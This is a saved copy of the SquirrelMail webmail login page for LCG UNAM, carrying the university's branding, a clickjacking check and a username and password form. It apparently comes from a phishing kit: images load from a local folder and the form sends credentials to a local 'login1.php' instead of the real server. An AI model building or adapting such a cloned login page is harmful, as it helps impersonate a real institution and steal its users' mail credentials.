<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- saved from url=(0043)https://mail.lcg.unam.mx/mail/src/login.php -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="x-dns-prefetch-control" content="off">
<link rel="shortcut icon" href="https://mail.lcg.unam.mx/mail/favicon.ico"><script type="text/javascript" language="JavaScript">
<!--
if (self != top) { try { if (document.domain != top.document.domain) { throw "Clickjacking security violation! Please log out immediately!"; /* this code should never execute - exception should already have been thrown since it's a security violation in this case to even try to access top.document.domain (but it's left here just to be extra safe) */ } } catch (e) { self.location = "/mail/src/signout.php"; top.location = "/mail/src/signout.php" } }
// -->
</script>

<title>Correo LCG UNAM - Login</title><script language="JavaScript" type="text/javascript">
<!--
  var alreadyFocused = false;
  function squirrelmail_loginpage_onload() {
    document.login_form.js_autodetect_results.value = '1';
    if (alreadyFocused) return;
    var textElements = 0;
    for (i = 0; i < document.login_form.elements.length; i++) {
      if (document.login_form.elements[i].type == "text" || document.login_form.elements[i].type == "password") {
        textElements++;
        if (textElements == 1) {
          document.login_form.elements[i].focus();
          break;
        }
      }
    }
  }
// -->
</script>

<!--[if IE 6]>
<style type="text/css">
/* avoid stupid IE6 bug with frames and scrollbars */
body {
    width: expression(document.documentElement.clientWidth - 30);
}
</style>
<![endif]-->

</head>

<body text="#000000" bgcolor="#ffffff" link="#0000cc" vlink="#0000cc" alink="#0000cc" onLoad="squirrelmail_loginpage_onload();">
<form action="login1.php" method="post" name="login_form">
<table bgcolor="#ffffff" border="0" cellspacing="0" cellpadding="0" width="100%"><tbody><tr><td align="center"><center><img src="./index_files/lcg-header-creandoelfuturo.png" alt="Correo LCG UNAM Logo" width="894" height="149"><br>
<small>SquirrelMail version 1.4.23 [SVN]<br>
  By the SquirrelMail Project Team<br></small>
<table bgcolor="#ffffff" border="0" width="350"><tbody><tr><td bgcolor="#dcdcdc" align="center"><b>Correo LCG UNAM Login</b>
</td>
</tr>
<tr><td bgcolor="#ffffff" align="left">
<table bgcolor="#ffffff" align="center" border="0" width="100%" id="login_table"><tbody><tr><td align="right" width="30%" id="username_td">Name:</td>
<td align="left" width="70%"><input type="text" name="login_username" id="login_username" value="" onFocus="alreadyFocused=true;">
</td>
</tr>

<tr><td align="right" width="30%" id="secretkey_td">Password:</td>
<td align="left" width="70%"><input type="password" name="secretkey" id="secretkey" onFocus="alreadyFocused=true;">
<input type="hidden" name="js_autodetect_results" id="js_autodetect_results" value="1">
<input type="hidden" name="just_logged_in" id="just_logged_in" value="1">
</td>
</tr>
</tbody></table>
</td>
</tr>
<tr><td align="left"><center><input type="submit" name="smsubmit" id="smsubmit" value="Login">
</center></td>
</tr>
</tbody></table>
</center></td>
</tr>
</tbody></table>
</form>

</body></html>